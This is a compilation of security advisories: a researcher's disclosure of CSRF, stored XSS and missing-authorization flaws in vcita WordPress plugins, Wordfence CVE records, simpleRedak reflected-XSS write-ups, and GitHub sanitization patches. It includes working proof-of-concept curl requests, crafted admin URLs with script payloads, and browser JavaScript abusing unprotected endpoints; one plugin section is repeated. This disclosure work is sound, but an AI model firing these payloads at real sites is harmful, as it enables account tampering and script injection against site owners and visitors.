The Event Registration Calendar By vcita plugin, versions up to and including 3.9.1, and Online Payments – Get Paid with PayPal, Square & Stripe plugin, for WordPress are vulnerable to Cross-Site Request Forgery. This is due to missing nonce validation in the ls_parse_vcita_callback() function. This makes it possible for unauthenticated attackers to modify the plugin's settings and inject malicious JavaScript via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.

On 02/02/2023 I discovered several security vulnerabilities in the WordPress plugins by vcita and reached out to the company according to responsible disclosure principles. **Unfortunately, vcita has not patched the security holes for 120 days.** For this reason, I have now opted for public disclosure to warn users.

The following CVEs have been assigned to the security vulnerabilities:  

1\. **CVE-2023-2298** – Online Booking & Scheduling Calendar for WordPress by vcita <= 4.2.10 – Unauthenticated Stored Cross-Site Scripting

2\. **CVE-2023-2299** – Online Booking & Scheduling Calendar for WordPress by vcita <= 4.2.10 – Missing Authorization on REST-API

3\. **CVE-2023-2300** – Contact Form Builder by vcita <= 4.9.1 – Authenticated (Contributor+) Stored Cross-Site Scripting

4\. **CVE-2023-2301** – Contact Form Builder by vcita <= 4.9.1 – Cross-Site Request Forgery to Stored Cross-Site Scripting

5\. **CVE-2023-2302** – Contact Form and Calls To Action by vcita <= 2.6.4 – Authenticated (Contributor+) Stored Cross-Site Scripting

6\. **CVE-2023-2303** – Contact Form and Calls To Action by vcita <= 2.6.4 – Cross-Site Request Forgery to Stored Cross-Site Scripting

7\. **CVE-2023-2404** – CRM and Lead Management by vcita <= 2.6.2 – Authenticated (Contributor+) Stored Cross-Site Scripting

8\. **CVE-2023-2405** – CRM and Lead Management by vcita <= 2.6.2 – Cross-Site Request Forgery to Stored Cross-Site Scripting

9\. **CVE-2023-2406** – Event Registration Calendar By vcita <= 1.3.1 & Online Payments – Get Paid with PayPal, Square & Stripe <= 3.9.1 – Authenticated (Contributor+) Stored Cross-Site Scripting

10\. **CVE-2023-2407** – Event Registration Calendar By vcita <= 1.3.1 & Online Payments – Get Paid with PayPal, Square & Stripe <= 3.9.1 – Cross-Site Request Forgery to Stored Cross-Site Scripting

11\. **CVE-2023-2414** – Online Booking & Scheduling Calendar for WordPress by vcita <= 4.2.10 – Missing Authorization to Settings Update and Media Upload

12\. **CVE-2023-2415** – Online Booking & Scheduling Calendar for WordPress by vcita <= 4.2.10 – Missing Authorization to Account Logout

13\. **CVE-2023-2416** – Online Booking & Scheduling Calendar for WordPress by vcita <= 4.2.10 – Cross-Site Request Forgery to Account Logout

**Online Booking & Scheduling Calendar for WordPress by vcita (4.1 – 4.2.10)  
**Stored Cross Site Scripting, Missing Authentication  
The plugin uses an unprotected REST route endpoint to set the connection parameters for the vcita account connection. The variables are stored in the database without any validation and are later inserted into the website without any sanitation.

Proof of Concept  
1\. Attacker sends the following curl request to a website that uses the vcita widget. The request updates the \`uid\` & \`business\_id\` & \`business\_name\` & \`email\` variables in the database:  
   “\`curl  
   curl –request POST \\  
   –url https://example.com/wp-json/vcita-wordpress/v1/actions/auth \\  
   –header ‘Content-Type: application/json’ \\  
   –data ‘{  
       “success”: true,  
       “user\_data”: {  
           “business\_id”: “\\”; alert(1); //”,  
           “business\_name”: “Evil Eve”,  
           “email”: “\[email protected\]”  
       }  
   }’  
   “\`  
2\. The injected alert(1) is executed on the live website

**Contact Form Builder by vcita (<= 4.9.1)**  
The plugin does not validate $\_GET parameters and stores them directly in the database. These values are later inserted into the page without sanitation. This endpoint also does not have sufficient access control since all users with the edit\_posts capability can open it.

Proof of Concept  
1\. Case A: If the attacker has edit\_posts capability on the target website, he opens the following URL: example.com/wp-admin/admin.php?page=live-site-parse-vcita-callback&success=true&uid=a&first\_name=a-a&last\_name=b&title=c&confirmation\_token=d&confirmed=true&engage\_delay=1&implementation\_key=1&email=a“/><script>alert(1);</script>\`  
Case B: If the attacker does not have the edit\_posts capability he tricks an user that does have this capability into opening the URL  
2\. The email field \`a”/><script>alert(1);</script>\` is stored in the database  
3\. When an admin opens the plugin’s settings page (\`wp-admin/admin.php?page=live-site\`) the alert is triggered.

**Contact Form and Calls To Action by vcita (<= 2.6.4)  
**The plugin adds a poorly protected endpoint to set the connection parameters for the vcita account connection. The variables are stored in the database without any validation and are later inserted into the website without any sanitation.

Proof of Concept  
1\. Case A: If the attacker has edit\_posts capability on the target website, he opens the following URL: \`example.com/wp-admin/admin.php?page=lead-capturing-call-to-actions-by-vcita/vcita-callback.php&success=true&first\_name=a-a&last\_name=b&title=c&confirmation\_token=d&confirmed=true&engage\_delay=1&implementation\_key=1&email=a“/><script>alert(1);</script>&uid=a”</script><script>alert(2);</script>\`

Case B: If the attacker does not have the edit\_posts capability he tricks an user that does have this capability into opening the URL mentioned above  
2\. The fields \`email=a”/><script>alert(1);</script>\` and \`uid=a”</script><script>alert(2);</script>\` are stored in the database  
3\. When a user opens the plugin’s settings page (\`/wp-admin/admin.php?page=lead-capturing-call-to-actions-by-vcita/vcita-settings-functions.php\`) \`alert(1)\` is triggered. Any visitor will get \`alert(2)\` when browsing the infected site.

**CRM and Lead Management by vcita (<= 2.6.2)  
**The plugin adds a poorly protected endpoint to set the connection parameters for the vcita account connection. The variables are stored in the database without any validation and are later inserted into the website without any sanitation.

Proof of Concept  
1\. Case A: If the attacker has edit\_posts capability on the target website, he opens the following URL: \`example.com/wp-admin/admin.php?page=crm-customer-relationship-management-by-vcita/vcita-callback.php&success=true&first\_name=a-a&last\_name=b&title=c&confirmation\_token=d&confirmed=true&engage\_delay=1&implementation\_key=1&email=a“/><script>alert(1);</script>&uid=a”</script><script>alert(2);</script>\`  
Case B: If the attacker does not have the edit\_posts capability he tricks an user that does have this capability into opening the URL mentioned above  
2\. The fields \`email=a”/><script>alert(1);</script>\` and \`uid=a”</script><script>alert(2);</script>\` are stored in the database  
3\. When a user opens the plugin’s settings page (\`/wp-admin/admin.php?page=crm-customer-relationship-management-by-vcita/vcita-settings-functions.php\`) \`alert(1)\` is triggered. Any visitor will get \`alert(2)\` when browsing the infected site.

**CRM and Lead Management by vcita (<= 2.6.2)  
**The plugin adds a poorly protected endpoint to set the connection parameters for the vcita account connection. The variables are stored in the database without any validation and are later inserted into the website without any sanitation.

Proof of Concept  
1\. Case A: If the attacker has edit\_posts capability on the target website, he opens the following URL: \`example.com/wp-admin/admin.php?page=crm-customer-relationship-management-by-vcita/vcita-callback.php&success=true&first\_name=a-a&last\_name=b&title=c&confirmation\_token=d&confirmed=true&engage\_delay=1&implementation\_key=1&email=a“/><script>alert(1);</script>&uid=a”</script><script>alert(2);</script>\`

Case B: If the attacker does not have the edit\_posts capability he tricks an user that does have this capability into opening the URL mentioned above

2\. The fields \`email=a”/><script>alert(1);</script>\` and \`uid=a”</script><script>alert(2);</script>\` are stored in the database  
3\. When a user opens the plugin’s settings page (\`/wp-admin/admin.php?page=crm-customer-relationship-management-by-vcita/vcita-settings-functions.php\`) \`alert(1)\` is triggered. Any visitor will get \`alert(2)\` when browsing the infected site.

**Event Registration Calendar By vcita (<= 1.3.1)  
**The plugin adds a poorly protected endpoint to set the connection parameters for the vcita account connection. The variables are stored in the database without any validation and are later inserted into the website without any sanitation.

Proof of Concept  
1\. Case A: If the attacker has edit\_posts capability on the target website, he opens the following URL: \`example.com/wp-admin/admin.php?page=live-site-parse-vcita-callback&success=true&first\_name=a-a&last\_name=b&title=c&confirmation\_token=d&confirmed=true&engage\_delay=1&implementation\_key=1&email=a“/><script>alert(1);</script>&uid=a\`  
Case B: If the attacker does not have the edit\_posts capability he tricks an user that does have this capability into opening the URL mentioned above  
2\. The fields \`email=a”/><script>alert(1);</script>\` and \`uid=a”</script><script>alert(2);</script>\` are stored in the database  
3\. When a user opens the plugin’s settings page (\`/wp-admin/admin.php?page=crm-customer-relationship-management-by-vcita/vcita-settings-functions.php\`) \`alert(1)\` is triggered.

**Online Payments – Get Paid with PayPal, Square & Stripe (<= 3.9.1)  
**The plugin adds a poorly protected endpoint to set the connection parameters for the vcita account connection. The variables are stored in the database without any validation and are later inserted into the website without any sanitation.

Proof of Concept  
1\. Case A: If the attacker has edit\_posts capability on the target website, he opens the following URL: \`example.com/wp-admin/admin.php?page=live-site-parse-vcita-callback&success=true&uid=a&first\_name=a-a&last\_name=b&title=c&confirmation\_token=d&confirmed=true&engage\_delay=1&implementation\_key=1&email=a“/><script>alert(1);</script>\`  
Case B: If the attacker does not have the edit\_posts capability he tricks an user that does have this capability into opening the URL mentioned above  
2\. The email field \`a”/><script>alert(1);</script>\` is stored in the database  
3\. When an admin opens the plugin’s settings page (\`wp-admin/admin.php?page=live-site\`) the alert is triggered (vcita has to be connected) In Case B if an admin opens the link the site will redirect directly to the infected page.

**Online Booking & Scheduling Calendar for WordPress by vcita (<= 4.2.10)  
**This privilege escalation allows any logged-in user (subscriber level is sufficient) to upload an arbitrary number of files to the Media Library.

Proof of Concept  
1\. Attacker registers on the website.  
2\. Attacker adds a new input field in his browser: \`<input type=”file” name=”my\_files\[\]”>\` and selects an image file (vcita\_save\_settings\_callback does check for allowed mime types)  
3\. Attacker opens the browser’s developer tools and runs the following JavaScript:  
       const input = document.querySelector(‘input\[type=”file”\]’);  
       const file = input.files\[0\];  
       const formData = new FormData();  
       formData.append(“widget\_img”, file);  
       const xhr = new XMLHttpRequest();  
       xhr.open(  
         “POST”,  
“https://example.com/wp-admin/admin-ajax.php?action=vcita\_save\_settings”,  
         true  
       );  
       xhr.send(formData);  
    4. Image is now uploaded to the website.

**Online Booking & Scheduling Calendar for WordPress by vcita (<= 4.2.10)  
**This privilege escalation allows a logged-in user (subscriber level is sufficient) to log the administrator out of the vcita account. As a result, website visitors will not be able to make appointments and the owner of the website may lose a considerable amount of revenue.  
Another attack vector would be to use Cross-Site Request Forgery (CSRF) to manipulate any logged in user to perform the logout.

Proof of Concept  
1\. Attacker registers on the website.  
2\. Attacker opens the browser’s developer tools and runs the following JavaScript:  
   fetch(“/wp-admin/admin-ajax.php?action=vcita\_logout”, {  
     method: “POST”,  
     headers: {  
       Accept: “\*/\*”,  
       “Content-Type”: “application/json”,  
     },  
   });  
   Alternative: manipulate any logged in user to send a POST request to the server.  
3\. Website connection with vcita account is deactivated.

CVE-2023-2407: Security Vulnerabilities in WordPress Plugins by vcita – Jonas' Blog

The Page Builder by AZEXO plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.27.133. This is due to missing or incorrect nonce validation on the 'azh_save' function. This makes it possible for unauthenticated attackers to update the post content and inject malicious JavaScript via a forged request, granted they can trick a site administrator into performing an action such as clicking on a link.

This record contains material that is subject to copyright.

**Copyright 2012-2023 Defiant Inc.**

**License:** Defiant hereby grants you a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable copyright license to reproduce, prepare derivative works of, publicly display, publicly perform, sublicense, and distribute this software vulnerability information. Any copy of the software vulnerability information you make for such purposes is authorized provided that you include a hyperlink to this vulnerability record and reproduce Defiant's copyright designation and this license in any such copy. **Read more.**

**Copyright 1999-2023 The MITRE Corporation**

**License:** CVE Usage: MITRE hereby grants you a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable copyright license to reproduce, prepare derivative works of, publicly display, publicly perform, sublicense, and distribute Common Vulnerabilities and Exposures (CVE®). Any copy you make for such purposes is authorized provided that you reproduce MITRE's copyright designation and this license in any such copy. **Read more.**

Have information to add, or spot any errors? Contact us at wfi-support@wordfence.com so we can make any appropriate adjustments.

CVE-2023-3055: Page Builder by AZEXO <= 1.27.133 - Cross-Site Request Forgery to Stored Cross-Site Scripting via azh_save — Wordfence Intelligence

The Page Builder by AZEXO plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'azh_post' shortcode in versions up to, and including, 1.27.133 due to insufficient input sanitization and output escaping. This makes it possible for contributor-level attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

CVE-2023-3051: Page Builder by AZEXO <= 1.27.133 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode — Wordfence Intelligence

eMedia Consulting simpleRedak up to v2.47.23.05 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the component /scheduler/index.php.

**eMedia Consulting simpleRedak - Reflected Cross-Site Scripting**

A reflected Cross-Site Scripting (XSS) vulnerability was discovered in the /scheduler/index.php component.

The vulnerability was reported as CVE-2023-33763.

**Versions affected: simpleRedak <= 2.47.23.05**

Figure 1: Reflected XSS via injecting a malicious string into a URL parameter

**Background**

An attacker may craft a malicious link that contains an XSS payload. Should the victim click on the link, this could lead to XSS in their browser window.

**Steps to Reproduce**

For the proof-of-concept screenshots we have used the following payload:

    <url>/module/scheduler/index.php?week=1e3czz%22%3E%3Cscript%3Ealert(%27Pentest%20Factory%20XSS,%20Location:%20%27%2bdocument.location)%3C%2fscript%3Eye23r&art=persoplan&cutter=1&activity=36&plan=1&format=678
    

**Root Cause**

This issue exists due to insufficient input filtering in a form that reflects the "week" parameter as an attribute value. By supplying a double quote character (") it is possible to break out of the attribute string and inject custom HTML.

Figure 2: Root cause: Insufficient input filtering in the reflected URL parameter

**Fix**

All software versions up to and including version 2.47.23.05 are affected. The vendor was informed of the finding on May 5, 2023. The vulnerability is fixed with version 2.47.23.06.

CVE-2023-33763: CVEs/CVE-2023-33763 at main · rauschecker/CVEs

eMedia Consulting simpleRedak up to v2.47.23.05 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the component /view/cb/format_642.php.

**eMedia Consulting simpleRedak - Reflected Cross-Site Scripting**

A reflected Cross-Site Scripting (XSS) vulnerability was discovered in the /view/cb/format\_642.php component.

The vulnerability was reported as CVE-2023-33761.

**Versions affected: simpleRedak <= 2.47.23.05**

Figure 1: Reflected XSS via injecting a malicious string into a URL parameter

**Background**

An attacker may craft a malicious link that contains an XSS payload. Should the victim click on the link, this could lead to XSS in their browser window.

**Steps to Reproduce**

For the proof-of-concept screenshots we have used the following payload:

    <url>/module/castingbogen/view/cb/format_642.php/qyhgn%22%3E%3Cscript%3Ealert(document.location)%3C/script%3Eb0uud?code=dd3c28e36a&cast=2479882
    

**Root Cause**

This issue exists due to insufficient input filtering in a form that reflects the full URL in the "action" attribute value. By supplying a double quote character (") it is possible to break out of the attribute string and inject custom HTML.

Figure 2: Root cause: Insufficient input filtering in the reflected URL

**Fix**

All software versions up to and including version 2.47.23.05 are affected. The vendor was informed of the finding on May 5, 2023. The vulnerability is fixed with version 2.47.23.06.

CVE-2023-33761: CVEs/CVE-2023-33761 at main · rauschecker/CVEs

Cross-site Scripting (XSS) - Stored in GitHub repository tsolucio/corebos prior to 8.

Skip to content

Sign up

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    
    Explore
    
    *   All features
    *   Documentation
    *   GitHub Skills
    *   Blog
    
*   For
    
    *   Enterprise
    *   Teams
    *   Startups
    *   Education
    
    By Solution
    
    *   CI/CD & Automation
    *   DevOps
    *   DevSecOps
    
    Case Studies
    
    *   Customer Stories
    *   Resources
    
*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
    Repositories
    
    *   Topics
    *   Trending
    *   Collections
    
*   Pricing

*   In this repository All GitHub
    

*   No suggested jump to results

*   In this repository All GitHub
    
*   In this organization All GitHub
    
*   In this repository All GitHub
    

Sign in

Sign up

tsolucio / **corebos** Public

*   Notifications
*   Fork 142
*   Star 131
    

*   Code
*   Issues 102
*   Pull requests 2
*   Actions
*   Security
*   Insights

More

**Commit**

Permalink

Browse files

Browse the repository at this point in the history

sec(Documents) sanitize and limit folder name and description

*   Loading branch information

joebordes committed

Jun 2, 2023

1 parent 5e87fbc commit e87f77c

Showing **1 changed file** with **2 additions** and **2 deletions**.

4 changes: 2 additions & 2 deletions modules/Documents/SaveFolder.php

Show comments View file

Expand Up

@@ -15,8 +15,8 @@

  

$local\_log = LoggerManager::getLogger('index');

$folderid = isset($\_REQUEST\['record'\]) ? vtlib\_purify($\_REQUEST\['record'\]) : '';

$foldername = utf8RawUrlDecode($\_REQUEST\['foldername'\]);

$folderdesc = utf8RawUrlDecode($\_REQUEST\['folderdesc'\]);

$foldername = substr(vtlib\_purify(trim(utf8RawUrlDecode($\_REQUEST\['foldername'\]))), 0, 20);

$folderdesc = substr(vtlib\_purify(trim(utf8RawUrlDecode($\_REQUEST\['folderdesc'\]))), 0, 50);

  

if (isset($\_REQUEST\['savemode'\]) && $\_REQUEST\['savemode'\] == 'Save') {

if ($folderid == '') {

Expand Down

**0 comments on commit e87f77c**

Please sign in to comment.

CVE-2023-3073: sec(Documents) sanitize and limit folder name and description · tsolucio/corebos@e87f77c

CVE-2023-3074

Expand Up

@@ -37,7 +37,7 @@

$id = $adb\->getUniqueID("vtiger\_$tableName");

$picklist\_valueid = getUniquePicklistID();

$sql = "insert into vtiger\_$tableName values (?,?,?,?)";

$adb\->pquery($sql, array($id, $val, 1, $picklist\_valueid));

$adb\->pquery($sql, array($id, vtlib\_purify($val), 1, $picklist\_valueid));

//add the picklist values to the selected roles

foreach ($roles as $roleid) {

$sql ="select max(sortid)+1 as sortid

Expand Down

CVE-2023-3071: sec(Picklist) sanitize picklist values · tsolucio/corebos@5e87fbc

CVE-2023-3070

Cross-site Scripting (XSS) - Stored in GitHub repository zadam/trilium prior to 0.59.4.

Expand Up

@@ -307,7 +307,7 @@ function highlightSearchResults(searchResults, highlightedTokens) {

for (const result of searchResults) {

const note \= becca.notes\[result.noteId\];

  

result.highlightedNotePathTitle \= result.notePathTitle.replace('/\[<\\{\\}\]/g', '');

result.highlightedNotePathTitle \= result.notePathTitle.replace(/\[<{}\]/g, '');

  

if (highlightedTokens.find(token \=> note.type.includes(token))) {

result.highlightedNotePathTitle += \` "type: ${note.type}'\`;

Expand Down

Tag

#xss